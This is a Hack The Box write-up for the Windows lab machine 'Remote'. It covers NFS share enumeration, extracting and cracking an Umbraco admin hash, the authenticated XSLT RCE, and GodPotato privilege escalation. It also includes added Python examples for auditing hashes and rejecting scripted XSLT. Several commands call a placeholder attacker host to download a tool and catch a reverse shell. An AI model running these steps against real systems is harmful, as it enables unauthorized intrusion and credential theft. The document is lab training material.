Remote // Hack The Box

Info        Value
OS          Windows
Difficulty  Easy
IP          10.129.x.x
Hostname    remote.htb
Services    FTP (21), HTTP (80), RPC (111), SMB (135/139/445), NFS (2049), WinRM (5985)

Enumeration

Nmap

sudo nmap -Pn -sC -sV -p- -vvv -oA scan/nmap.scan remote.htb
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0

Open ports:

  • 21/tcp // FTP — Microsoft ftpd, anonymous login allowed (empty, no write)
  • 80/tcp // HTTP — “Acme Widgets” website running Umbraco CMS
  • 111/tcp // rpcbind — NFS services registered (mountd, nlockmgr, status)
  • 135/139/445 // SMB/RPC — signing enabled but not required, no null session access
  • 2049/tcp // NFS — critical attack surface
  • 5985/tcp // WinRM — potential remote shell with valid credentials

FTP Enumeration

Anonymous login allowed but the root directory is empty and write permissions are denied. Dead end.

SMB Enumeration

No accessible shares with null session. Dead end.

NFS Enumeration

showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

The /site_backups share is accessible to everyone — this is a full backup of the Umbraco web application.

sudo mount -t nfs remote.htb:/site_backups /mnt/

Web Enumeration

The web application on port 80 is an Umbraco CMS instance. Directory enumeration with feroxbuster revealed:

  • /umbraco — admin login panel
  • /install — redirects to /umbraco/
  • /intranet, /blog, /products, /people, /contact — content pages

The NFS backup confirms the exact Umbraco version and provides direct access to application data files.


Foothold // Umbraco Authenticated RCE

Credential Extraction from NFS Backup

The NFS share contains the full Umbraco application. The key file is the embedded database:

strings /mnt/App_Data/Umbraco.sdf | grep -i admin@htb.local
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.local

Three users found:

  • admin@htb.local — SHA1 hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
  • smith@htb.local — HMACSHA256 hash (salted, not directly crackable)
  • ssmith@htb.local — HMACSHA256 hash (salted, not directly crackable)
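As an added example (not code from the writeup), a small Python audit that parses the run-together records in the strings output above and flags accounts still stored as unsalted SHA1; the record layout and the non-admin sample line are assumptions, and the check generalizes to every user record in the dump, not only the three listed:

```python
"""Audit which accounts in a `strings` dump of Umbraco.sdf still use unsalted SHA1.
Added example, not code from the writeup. Assumes the record layout shown above:
<username><email><hash material>{"hashAlgorithm":"..."}<email>; "hash material" is
everything between the e-mail and the JSON block (assumed to hold salt+digest
run together for the salted schemes)."""
import re
from dataclasses import dataclass
from typing import List, Optional

CONFIG_RE = re.compile(r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}')
SHA1_HEX_RE = re.compile(r"^[0-9a-f]{40}$")

@dataclass
class UmbracoUser:
    username: str
    email: str
    algorithm: str
    hash_material: str
    weak: bool  # bare SHA1 digest: no salt, attackable with hashcat -m 100

def parse_user_record(line: str) -> Optional[UmbracoUser]:
    """Split one run-together record into fields, or return None for other strings.
    The JSON block is the only unambiguous delimiter; the e-mail after it also occurs
    once before the hash, so its first occurrence in the prefix marks the boundary."""
    m = CONFIG_RE.search(line)
    if not m:
        return None
    email = line[m.end():].strip()
    prefix = line[:m.start()]
    idx = prefix.find(email)
    if "@" not in email or idx < 0:
        return None
    material = prefix[idx + len(email):]
    alg = m.group("alg").upper()
    weak = alg == "SHA1" and SHA1_HEX_RE.match(material) is not None
    return UmbracoUser(prefix[:idx], email, alg, material, weak)

def audit(dump: str) -> List[UmbracoUser]:
    return [u for u in map(parse_user_record, dump.splitlines()) if u]

def weak_accounts(dump: str) -> List[str]:
    return [u.email for u in audit(dump) if u.weak]

# Constructed sample: the admin line mirrors the writeup, the others are invented
SAMPLE_DUMP = """\
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.local
smithsmith@htb.localQUJDREVGR0hJSktMTU5PUA==MTIzNDU2Nzg5MDEyMzQ1Ng=={"hashAlgorithm":"HMACSHA256"}smith@htb.local
Microsoft SQL Server Compact
"""
```

Running audit(SAMPLE_DUMP) lists admin@htb.local as the only weak account; smith@htb.local is recognised but left alone because its scheme is HMACSHA256.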

Hash Cracking

echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' > admin.sha1
hashcat -m 100 admin.sha1 /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Credentials: admin@htb.local:baconandcheese

Umbraco RCE // Exploit-DB #46153

Vulnerability

Umbraco CMS 7.12.4 — Authenticated remote code execution via XSLT stylesheet injection. The /umbraco/developer/Xslt/xsltVisualize.aspx endpoint allows authenticated administrators to upload and execute XSLT templates. A crafted XSLT payload containing inline C# code executes arbitrary commands on the server via System.Diagnostics.Process.

Structural root cause: the XSLT visualization feature trusts authenticated admin users to provide safe stylesheets, but XSLT supports embedded scripting (msxsl:script) that executes native code — no sandboxing or content filtering is applied.

Ref: https://www.exploit-db.com/exploits/46153
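Added defender-side example, not Umbraco's code: a pre-load check in Python that rejects a stylesheet carrying an msxsl:script block (the construct the exploit relies on) or a document() call, the two features that XsltSettings gates in .NET; the sample stylesheets are constructed.

```python
"""Reject XSLT stylesheets that would run code or fetch external resources when
loaded into System.Xml.Xsl.XslCompiledTransform. Added example, not Umbraco's
code; the two checks mirror the EnableScript / EnableDocumentFunction switches of
XsltSettings. The sample stylesheets below are constructed."""
import xml.etree.ElementTree as ET
from typing import List

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"   # namespace of msxsl:script
XPATH_ATTRS = ("select", "test", "match")     # attributes holding XPath expressions

def find_dangerous_constructs(xslt_text: str) -> List[str]:
    """Return findings for one stylesheet; an empty list means it is inert."""
    findings = []
    try:
        root = ET.fromstring(xslt_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for elem in root.iter():
        # msxsl:script compiles embedded C#/VB/JScript into the transform itself
        if elem.tag == f"{{{MSXSL_NS}}}script":
            findings.append(f"embedded script block (language={elem.get('language', 'JScript')})")
        # document() resolves arbitrary URIs/paths under the worker's identity
        for attr in XPATH_ATTRS:
            expr = elem.get(attr, "")
            if "document(" in expr:
                findings.append(f'document() call in {attr}="{expr}"')
    return findings

def is_safe_stylesheet(xslt_text: str) -> bool:
    return not find_dangerous_constructs(xslt_text)

# Constructed samples: a plain template, and one using both blocked features
BENIGN_XSLT = f"""<xsl:stylesheet version="1.0" xmlns:xsl="{XSL_NS}">
  <xsl:template match="/"><ul><xsl:for-each select="//item">
    <li><xsl:value-of select="."/></li></xsl:for-each></ul></xsl:template>
</xsl:stylesheet>"""

SCRIPTED_XSLT = f"""<xsl:stylesheet version="1.0" xmlns:xsl="{XSL_NS}"
    xmlns:msxsl="{MSXSL_NS}" xmlns:u="urn:user">
  <msxsl:script language="C#" implements-prefix="u">
    public string Now() {{ return System.DateTime.Now.ToString(); }}
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="u:Now()"/>
    <xsl:copy-of select="document('http://example.invalid/data.xml')"/>
  </xsl:template>
</xsl:stylesheet>"""
```

The same two switches are what a .NET host should pass as XsltSettings when loading the transform; this check only catches the stylesheet earlier, before it reaches the engine.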

Exploitation

Used a Python exploit for Umbraco authenticated RCE:

python exploit.py -u admin@htb.local -p baconandcheese -w 'http://remote.htb' -i <ATTACKER_IP>
[*] Logging in at http://remote.htb/umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://remote.htb/umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv>

Shell obtained as iis apppool\defaultapppool.

User flag: obtained.


Privilege Escalation // GodPotato (SeImpersonatePrivilege)

Vulnerability

SeImpersonatePrivilege abuse — IIS application pool accounts run with SeImpersonatePrivilege, which allows the process to impersonate any token it can obtain. GodPotato exploits DCOM/RPCSS activation to coerce NT AUTHORITY\SYSTEM into authenticating, then impersonates that token for arbitrary command execution as SYSTEM.

Structural root cause: Windows grants SeImpersonatePrivilege to service accounts by default. Combined with the ability to trigger DCOM object activation (which authenticates as SYSTEM), any service account can escalate to full system privileges.

Exploitation

# Transfer GodPotato to target
PS C:\Windows\Temp> curl.exe http://<ATTACKER_IP>/GodPotato-NET2.exe -o C:\Windows\Temp\GodPotato.exe
PS C:\Windows\Temp> ./GodPotato.exe -cmd "cmd /c whoami"
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] Start Search System Token
[*] PID : 848 Token:0x800  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] CurrentUser: NT AUTHORITY\SYSTEM
nt authority\system

Reverse Shell as SYSTEM

Used GodPotato to execute a PowerShell reverse shell payload:

# Listener on attacker
nc -nvlp 443
connect to [<ATTACKER_IP>] from (UNKNOWN) [10.129.x.x] 49697
PS C:\Windows\Temp> whoami
nt authority\system

Root flag: obtained.


Attack Chain Summary

Nmap → 9 services, NFS share /site_backups accessible to everyone
       ↓
  Mount NFS → App_Data/Umbraco.sdf → admin@htb.local SHA1 hash
       ↓
  hashcat -m 100 → baconandcheese → Umbraco admin login
       ↓
  Umbraco authenticated RCE (XSLT injection) → shell as IIS AppPool
       ↓
  user.txt (C:\Users\Public\user.txt)
       ↓
  SeImpersonatePrivilege → GodPotato → NT AUTHORITY\SYSTEM
       ↓
  root.txt

Flags

  • User: obtained (as iis apppool\defaultapppool)
  • Root: obtained (as nt authority\system)

Lessons Learned

  • NFS shares on Windows are rare and high-value: When NFS is exposed on a Windows host, it almost always contains sensitive data. Always check showmount -e and mount every available share.
  • Embedded databases in web app backups: Umbraco uses .sdf (SQL Server Compact) as an embedded database. strings is sufficient to extract hashes — no need for specialized tools. Always look in App_Data/ for .NET applications.
  • SHA1 vs HMACSHA256: The admin account used plain SHA1 (hashcat mode 100, cracks instantly), while other accounts used salted HMACSHA256. Target the weakest hash algorithm first.
  • SeImpersonatePrivilege is a guaranteed SYSTEM path: Any Windows service account (IIS, MSSQL, etc.) with this privilege can escalate via potato attacks. Check whoami /priv immediately after landing a shell.
  • Umbraco XSLT RCE requires admin: The exploit targets the developer section’s XSLT visualizer — only accessible to admin accounts. Lower-privilege Umbraco accounts (editors, writers) cannot trigger it.

Timeline

  • Total time: ~2h
  • Where I spent the most time: Credential hunting in the NFS share and troubleshooting Umbraco login (required machine restart)
  • Subjective difficulty: 3/10